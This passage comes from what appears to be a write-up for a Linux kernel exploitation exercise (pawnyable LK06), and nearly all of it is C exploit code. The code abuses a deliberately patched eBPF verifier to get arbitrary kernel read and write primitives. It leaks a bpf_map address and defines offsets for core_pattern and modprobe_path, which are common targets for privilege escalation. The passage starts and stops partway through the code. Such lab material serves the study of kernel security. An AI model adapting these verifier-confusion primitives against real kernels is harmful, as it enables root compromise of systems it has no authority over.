bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); uint64_t val; bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (val != 0) { jit_addr = val; corrupted_map_fd = cur_map_fd; return; } } } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t jit_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; make_corrupted_map(); find_corrupted_map_and_leak_bpf_map_addr(); if (corrupted_map_fd == 0) { puts(&#34;[-] Failed to find corrupted bpf_map&#34;); return -1; } printf(&#34;[+] mapfd: %d\n&#34;, mapfd); printf(&#34;[+] corrupted_map_fd: %d\n&#34;, corrupted_map_fd); printf(&#34;[+] jit_addr: 0x%016lx\n&#34;, jit_addr); get_enter_to_continue(&#34;Press enter to exit(cause kernel crash)...&#34;); return 0; }</code></pre></div> <h2 id="refernece">Refernece</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/ebpf.html">https://pawnyable.cafe/linux-kernel/LK06/ebpf.html</a></li> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/verifier.html">https://pawnyable.cafe/linux-kernel/LK06/verifier.html</a></li> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/exploit.html">https://pawnyable.cafe/linux-kernel/LK06/exploit.html</a></li> </ul> <hr> <h2 id="lk06-brahman">LK06: Brahman</h2> <h3 id="exploit-using-adjust_ptr_min_max_vals">Exploit using adjust_ptr_min_max_vals</h3> <div class="collapsable-code"> <input id="149628537" type="checkbox" checked /> <label for="149628537"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd = -1; uint64_t leak_bpf_map_addr() { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = w1(r1) BPF_MOV64_REG(BPF_REG_0, BPF_REG_6), // r0 = r6 BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 += r1 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), // *(u64*)(fp-0x10) = r0 // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // *(u64*)(fp-0x08) = 0 BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), // arg2 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // arg2 = arg2(fp)-0x08 // arg3(&amp;val) = fp-0x10 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg3 = arg3(fp)-0x10 // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // arg4 = 0 // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); return val - 1 - 0x110; } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp 